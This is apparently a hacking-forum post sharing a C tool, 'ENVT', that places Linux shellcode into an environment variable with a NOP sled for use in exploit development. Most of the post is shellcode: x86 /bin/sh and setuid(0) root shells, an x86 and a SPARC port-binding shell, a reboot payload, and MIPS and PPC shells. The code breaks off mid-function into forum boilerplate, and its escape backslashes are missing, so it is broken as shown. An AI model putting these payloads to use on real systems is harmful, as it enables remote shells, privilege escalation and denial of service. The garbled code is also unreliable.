Jump to content
darkking

ENVT v0.01, Simple Environment shellcode injector for linux

By darkking, in Programare

Recommended Posts

darkking Newbie

darkking

Posted
Posted

Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs ,

this tool injects shellcodes into linux environment and uses these shellcodes

for exploit developing , maybe IDS detections or testing and other stuff ....

[ SIGINT , SIGHUP , SIGABRT handlers added ]

/*
* Qnix <Qnix@bsdmail.org>
* ENVT v0.01
*
* */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define VERSION  "v0.1"
#define MAX_SIZE 1024
#define SHSIZE  512
#define bash  "/bin/bash"
/* Prototype */
void getenvaddr(char *environment);
void help(char *string);
void setshenv(int shellcode);
/****************** START OF SHELLCODES ******************/
char execve_binbash[] =
"x31xc0"                    // xor    %eax, %eax
"x50"                        // push   %eax
"x68x2fx2fx73x68"        // push   $0x68732f2f
"x68x2fx62x69x6e"        // push   $0x6e69622f
"x89xe3"                    // mov    %esp, %ebx
"x50"                        // push   %eax
"x53"                        // push   %ebx
"x89xe1"                    // mov    %esp, %ecx
"x31xd2"                    // xor    %edx, %edx
"xb0x0b"                    // mov    $0xb, %al
"xcdx80";                   // int    $0x80
char execve_setuid_setgid_bb[] =
"x6ax17"   // push $0x17
"x58"   // pop  %eax
"x31xdb"   // xor %ebx, %ebx
"xcdx80"   // int $0x80
"x6ax2e"   // push $0x2e
"x58"   // pop %eax
"x53"   // push %ebx
"xcdx80"   // int $0x80
"x31xd2"   // xor %edx, %edx
"x6ax0b"   // push $0xb
"x58"   // pop %eax
"x52"   // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3"   // mov %esp, %ebx
"x52"   // push %edx
"x53"   // push %ebx
"x89xe1"   // mov %esp, %ecx
"xcdx80";   // int $0x80
char portbind_64713[] =
/* socket(AF_INET, SOCK_STREAM, 0) */
"x6ax66"   // push   $0x66
"x58"   // pop    %eax
"x6ax01"   // push   $0x1
"x5b"   // pop    %ebx
"x99"   // cltd
"x52"   // push   %edx
"x53"   // push   %ebx
"x6ax02"   // push   $0x2
"x89xe1"   // mov    %esp,%ecx
"xcdx80"   // int    $0x80
/* bind(s, server, sizeof(server)) */
"x52"   // push   %edx
"x66x68xfcxc9"  // pushw  $0xc9fc  // PORT = 64713
"x66x6ax02"  // pushw  $0x2
"x89xe1"   // mov    $esp,%ecx
"x6ax10"   // push   $0x10
"x51"   // push   %ecx
"x50"   // push   %eax
"x89xe1"   // mov    %esp,%ecx
"x89xc6"   // mov    %eax,%esi
"x43"   // inc    %ebx
"xb0x66"   // mov    $0x66,%al
"xcdx80"   // int    $0x80
/* listen(s, anything) */
"xb0x66"   // mov    $0x66,%al
"xd1xe3"   // shl    %ebx
"xcdx80"   // int    $0x80
/* accept(s, 0, 0) */
"x52"   // push   %edx
"x56"   // push   %esi
"x89xe1"   // mov    %esp,%ecx
"x43"   // inc    %ebx
"xb0x66"   // mov    $0x66,%al
"xcdx80"   // int    $0x80
"x93"   // xchg   %eax,%ebx
/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
"x6ax02"   // push   $0x2
"x59"   // pop    %ecx
"xb0x3f"   // mov    $0x3f,%al
"xcdx80"   // int    $0x80
"x49"   // dec    %ecx
"x79xf9"   // jns    dup_loop
/* execve("/bin/sh", ["/bin/sh"], NULL) */
"x6ax0b"   // push   $0xb
"x58"   // pop    %eax
"x52"   // push   %edx
"x68x2fx2fx73x68" // push   $0x68732f2f
"x68x2fx62x69x6e" // push   $0x6e69622f
"x89xe3"   // mov    %esp, %ebx
"x52"   // push   %edx
"x53"   // push   %ebx
"x89xe1"   // mov    %esp, %ecx
"xcdx80";   // int    $0x80
char reboot_20[] =
"x6ax58"              // push $0x58
"x58"                  // pop %eax
"xbbxadxdexe1xfe"  // mov $0xfee1dead,%ebx
"xb9x69x19x12x28"  // mov $0x28121969,%ecx
"xbax67x45x23x01"  // mov $0x1234567,%edx
"xcdx80";             // int $0x80
char sparc_portbind[]=
"x9dxe3xbfx78" // save  %sp, -136, %sp
"x90x10x20x02" // mov  2, %o0
"x92x10x20x01" // mov  1, %o1
"x94x22x80x0a" // sub  %o2, %o2, %o2
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st  %o2, [ %sp + 0x4c ]
"x90x10x20x01" // mov  1, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"xd0x27xbfxf4" // st  %o0, [ %fp + -12 ]
"x90x10x20x02" // mov  2, %o0
"xd0x37xbfxd8" // sth  %o0, [ %fp + -40 ]
"x13x08xc8xc8" // sethi  %hi(0x23232000), %o1
"x90x12x63x0f" // or  %o1, 0x30f, %o0
"xd0x37xbfxda" // sth  %o0, [ %fp + -38 ]
"xc0x27xbfxdc" // clr  [ %fp + -36 ]
"x92x07xbfxd8" // add  %fp, -40, %o1
"xd0x07xbfxf4" // ld  [ %fp + -12 ], %o0
"x94x10x20x10" // mov  0x10, %o2
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st  %o2, [ %sp + 0x4c ]
"x90x10x20x02" // mov  2, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"xd0x07xbfxf4" // ld  [ %fp + -12 ], %o0
"x92x10x20x05" // mov  5, %o1
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"x90x10x20x04" // mov  4, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"x92x07xbfxd8" // add  %fp, -40, %o1
"x94x07xbfxec" // add  %fp, -20, %o2
"xd0x07xbfxf4" // ld  [ %fp + -12 ], %o0
"xd0x23xa0x44" // st  %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st  %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st  %o2, [ %sp + 0x4c ]
"x90x10x20x05" // mov  5, %o0
"x92x03xa0x44" // add  %sp, 0x44, %o1
"x82x10x20xce" // mov  0xce, %g1
"x91xd0x20x10" // ta  0x10
"xd0x27xbfxf0" // st  %o0, [ %fp + -16 ]
"xd0x07xbfxf0" // ld  [ %fp + -16 ], %o0
"x92x22x40x09" // sub  %o1, %o1, %o1
"x82x10x20x5a" // mov  0x5a, %g1
"x91xd0x20x10" // ta  0x10
"xd0x07xbfxf0" // ld  [ %fp + -16 ], %o0
"x92x10x20x01" // mov  1, %o1
"x82x10x20x5a" // mov  0x5a, %g1
"x91xd0x20x10" // ta  0x10
"xd0x07xbfxf0" // ld  [ %fp + -16 ], %o0
"x92x10x20x02" // mov  2, %o1
"x82x10x20x5a" // mov  0x5a, %g1
"x91xd0x20x10" // ta  0x10
"x2dx0bxd8x9a" // sethi  %hi(0x2f626800), %l6
"xacx15xa1x6e" // or  %l6, 0x16e, %l6
"x2fx0bxdcxda" // sethi  %hi(0x2f736800), %l7
"x90x0bx80x0e" // and  %sp, %sp, %o0
"x92x03xa0x08" // add  %sp, 8, %o1
"x94x22x80x0a" // sub  %o2, %o2, %o2
"x9cx03xa0x10" // add  %sp, 0x10, %sp
"xecx3bxbfxf0" // std  %l6, [ %sp + -16 ]
"xd0x23xbfxf8" // st  %o0, [ %sp + -8 ]
"xc0x23xbfxfc" // clr  [ %sp + -4 ]
"x82x10x20x3b" // mov  0x3b, %g1
"x91xd0x20x10"; // ta  0x10
char mips_sh[] =
/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
"xffxffx10x04xabx0fx02x24"
"x55xf0x46x20x66x06xffx23"
"xc2xf9xecx23x66x06xbdx23"
"x9axf9xacxafx9exf9xa6xaf"
"x9axf9xbdx23x21x20x80x01"
"x21x28xa0x03xccxcdx44x03"
"/bin/sh";
char ppc_sh[] =
"x7cx3fx0bx78" /*mr r31,r1*/
"x7cxa5x2ax79" /*xor. r5,r5,r5*/
"x42x40xffxf9" /*bdzl+ 10000454<main>*/
"x7fx08x02xa6" /*mflr r24*/
"x3bx18x01x34" /*addi r24,r24,308*/
"x98xb8xfexfb" /*stb r5,-261(r24)*/
"x38x78xfexf4" /*addi r3,r24,-268*/
"x90x61xffxf8" /*stw r3,-8(r1)*/
"x38x81xffxf8" /*addi r4,r1,-8*/
"x90xa1xffxfc" /*stw r5,-4(r1)*/
"x3bxc0x01x60" /*li r30,352*/
"x7fxc0x2ex70" /*srawi r0,r30,5*/
"x44xdexadxf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL
/******************  END OF SHELLCODES  ******************/
int main(int argc, char *argv[]) {
int  c;
char buf1[MAX_SIZE];
char *addr = getenv("ENVT");
int  buf1i;
extern char *optarg;
extern int  optind, optopt;
if(addr != NULL) {
getenvaddr(addr);
exit(0);
}
if(argc < 2) {
help(argv[0]);
}
while((c = getopt(argc, argv, ":s:lhv")) != -1) {
switch© {
  case 'v':
   version();
   break;
  case 'h':
   help(argv[0]);
  case 'l':
   shellcode_list();
   break;
  case 's':
   strncpy(buf1,optarg,MAX_SIZE-1);
   buf1i = atoi(buf1);
   setshenv(buf1i);
   break;
  case ':':
   fprintf(stderr,"Option -%c requires an operandn",optopt);
   break;
  }
}
return(0);
}
/*
* Display version .
*
* */
int version() {
fprintf(stdout,"ENVT %sn",VERSION);
fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n");
exit(0);
}
/*
* Display help .
*
* */
void getenvaddr(char *environment) {
fprintf(stdout,"SHELLCODE FOUND IN %pn",environment);
}
void help(char *string) {
fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string);
exit(0);
}
/*
* Display shellcode list .
*
* */
int shellcode_list() {
fprintf(stdout,"nttt::[ LINUX/x86 ]::n");
fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");
fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn");
fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn");
fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn");
fprintf(stdout,"ttt::[ LINUX/SPARC ]::n");
fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn");
fprintf(stdout,"ttt::[ LINUX/MIPS  ]::n");
fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytesnn");
fprintf(stdout,"ttt::[ LINUX/PPC  ]::n");
fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn");
exit(0);
}
/*
* Set Shellcode in environment .
*
* */
void setshenv(int shellcode) {
char *addr = getenv("ENVT"); // Use to get shellcode addr
char execvebb[sHSIZE];  // Use for shellcode(1)
char setugbb[sHSIZE];  // Use for shellcode(2)
char portbind[sHSIZE];  // Use for shellcode(3)
char reboot[sHSIZE];  // Use for shellcode(4)
char sparc1[sHSIZE];  // Use for shellcode(5)
char mips1[sHSIZE];  // Use for shellcode(6)
char ppc1[sHSIZE];  // Use for shellcode(7)
if(shellcode >= 8) {
fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode);
exit(0);
}
/* Shellcode number 1 */
if(shellcode == 1) {
fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");
fprintf(stdout,"[+]t Setting memory for the shellcode .n");
memset(execvebb,0x90,SHSIZE);
fprintf(stdout,"[+]t Copying shellcode to memory .n");
memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));
memcpy(execvebb,"ENVT=",5);
fprintf(stdout,"[+]t Putting shellcode in the environment .n");
putenv(execvebb);
fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash));
execl(bash, bash, '



			
		


		
			

				
					
						

	
	
		

			
				
				

					
				

			
			
			
		

	


					
				
				
			

		

		
			

		
	


	
    


	



					
				
					
					
					






					
				
			
			



		

	


	
	

	
		
		

			
				
				

	
		

			
Join the conversation

			

	
				
					You can post now and register later.
				
				If you have an account, sign in now to post with your account.
				
			

	
		

	




	
	
		
	
		
	
		
	
	
		
		
	
	

		

		


	
		Guest
	


		

			
				
					
				
					
						
    
							
  • 
								


	
	
	
	

								
							
    • 
						

					
				
					
				
			
			
				
					
						
							
						
						



    

		
		

			
		

		
			
 Reply to this topic...

		
		

			

				
					×
					  Pasted as rich text.   Paste as plain text instead
				
			

		

		

			

				  Only 75 emoji are allowed.
			

		

		

			

				×
				  Your link has been automatically embedded.   Display as a link instead
			

		

		

			

			

		

		

			

				×
				  Your previous content has been restored.   Clear editor
			

		

		

			

				×
				  You cannot paste images directly. Upload or insert images from URL.
			

		

		
	

		
	

	

	

		

			×
			
		

		

	



						
					
				
					
				
					
				
			
			
    
				
					
						
					
						
					
						
							
  • 
								


    
	

    

								
							
    • 
						
					
				
				
					
  • 

	

    • 
				
			

		

	



			
		

	

	
		

			


		

		

			



		

	







	

		
			
				Go to topic listing
			
		
	

	




	

	

	


	

	




								


							

							


						

					

					
				

				

				

			

		

		
		


	×
	

		

			

			

				

					
				


			

			
		

	






	×
	

		

			
    
				
  • Create New...
    •